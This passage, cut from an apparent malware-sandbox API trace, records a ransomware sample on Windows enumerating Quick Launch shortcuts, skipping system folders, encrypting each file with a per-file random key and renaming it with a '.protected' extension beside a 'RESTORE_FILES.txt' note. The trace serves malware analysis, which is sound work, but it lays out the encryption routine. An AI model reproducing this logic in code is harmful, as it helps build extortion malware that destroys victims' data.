(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.959] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.960] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.960] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.960] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.960] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.960] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.960] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\..") returned 93 [0089.960] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.960] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.960] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.960] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.960] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.960] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.960] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.960] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0089.960] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0089.960] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0089.960] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0089.960] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0089.960] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 102 [0089.960] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0089.960] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0089.960] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.960] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.961] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 102 [0089.961] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0089.961] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 102 [0089.961] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0089.961] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 102 [0089.961] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0089.961] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xdd, lpOverlapped=0x0) returned 1 [0089.962] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.962] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xdd, lpOverlapped=0x0) returned 1 [0089.962] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.962] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.962] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.962] CloseHandle (hObject=0x150) returned 1 [0089.963] wnsprintfW (in: 
pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.protected") returned 112 [0089.963] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini.protected")) returned 1 [0089.964] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.964] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Windows") returned -1 [0089.964] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Program Files") returned -1 [0089.964] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Program Files (x86)") returned -1 [0089.964] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="$Recycle.bin") returned 1 [0089.964] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="System Volume Information") returned -1 [0089.964] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk") returned 108 [0089.964] StrStrIW (lpFirst="Google Chrome.lnk", lpSrch=".protected") returned 0x0 [0089.964] lstrcmpW (lpString1="Google Chrome.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0089.964] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.964] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk") returned 108 [0089.965] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".txt") returned 0x0 [0089.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk") returned 108 [0089.965] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".rar") returned 0x0 [0089.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk") returned 108 [0089.965] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".zip") returned 0x0 [0089.966] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x8e9, lpOverlapped=0x0) returned 1 [0089.983] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff717, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.983] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x8e9, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x8e9, lpOverlapped=0x0) returned 1 [0089.983] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.983] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.984] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.984] CloseHandle (hObject=0x150) returned 1 [0089.984] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk.protected") returned 118 [0089.984] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk.protected")) returned 1 [0089.985] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.985] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="Windows") returned -1 [0089.985] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="Program Files") returned -1 [0089.985] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="Program Files (x86)") returned -1 [0089.985] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="$Recycle.bin") returned 1 [0089.985] 
lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="System Volume Information") returned -1 [0089.985] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk") returned 127 [0089.985] StrStrIW (lpFirst="Launch Internet Explorer Browser.lnk", lpSrch=".protected") returned 0x0 [0089.985] lstrcmpW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0089.985] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.986] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk") returned 127 [0089.987] StrStrW (lpFirst="Launch Internet Explorer Browser.lnk", lpSrch=".txt") returned 0x0 [0089.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk") returned 127 [0089.987] StrStrW (lpFirst="Launch Internet Explorer Browser.lnk", lpSrch=".rar") returned 0x0 [0089.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk") returned 127 [0089.987] StrStrW (lpFirst="Launch Internet Explorer Browser.lnk", lpSrch=".zip") returned 0x0 [0089.987] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5a7, lpOverlapped=0x0) returned 1 [0089.993] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa59, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.993] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5a7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5a7, lpOverlapped=0x0) returned 1 [0089.993] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.993] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.994] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.994] CloseHandle (hObject=0x150) returned 1 [0089.994] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk.protected") returned 137 [0089.994] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk.protected")) returned 1 [0089.995] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.995] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Windows") returned -1 [0089.995] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Program Files") returned 1 [0089.995] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Program Files (x86)") returned 1 [0089.995] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="$Recycle.bin") returned 1 [0089.995] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="System Volume Information") returned -1 [0089.995] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 108 [0089.995] StrStrIW (lpFirst="Shows Desktop.lnk", lpSrch=".protected") returned 0x0 [0089.995] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0089.995] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.995] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet 
explorer\\quick launch\\shows desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.996] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 108 [0089.996] StrStrW (lpFirst="Shows Desktop.lnk", lpSrch=".txt") returned 0x0 [0089.996] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 108 [0089.997] StrStrW (lpFirst="Shows Desktop.lnk", lpSrch=".rar") returned 0x0 [0089.997] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 108 [0089.997] StrStrW (lpFirst="Shows Desktop.lnk", lpSrch=".zip") returned 0x0 [0089.997] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x122, lpOverlapped=0x0) returned 1 [0089.997] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffede, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.998] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x122, lpOverlapped=0x0) returned 1 [0089.998] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.998] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.998] WriteFile (in: hFile=0x150, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.998] CloseHandle (hObject=0x150) returned 1 [0089.998] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.protected") returned 118 [0089.998] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.protected")) returned 1 [0090.000] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.000] lstrcmpiW (lpString1="User Pinned", lpString2="Windows") returned -1 [0090.000] lstrcmpiW (lpString1="User Pinned", lpString2="Program Files") returned 1 [0090.000] lstrcmpiW (lpString1="User Pinned", lpString2="Program Files (x86)") returned 1 [0090.000] lstrcmpiW (lpString1="User Pinned", lpString2="$Recycle.bin") returned 1 [0090.000] lstrcmpiW (lpString1="User Pinned", lpString2="System Volume Information") returned 1 [0090.000] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 102 [0090.000] lstrcmpW (lpString1="User Pinned", lpString2=".") returned 1 [0090.000] lstrcmpW (lpString1="User Pinned", lpString2="..") returned 1 
[0090.000] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned 104 [0090.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0090.000] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.000] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.000] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.000] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.000] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.000] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.") returned 104 [0090.000] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.000] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.000] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.000] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.000] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.001] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.001] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.001] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.001] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.001] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.001] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.001] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\..") returned 105 [0090.001] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.001] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.001] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.001] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.001] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.001] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.." 
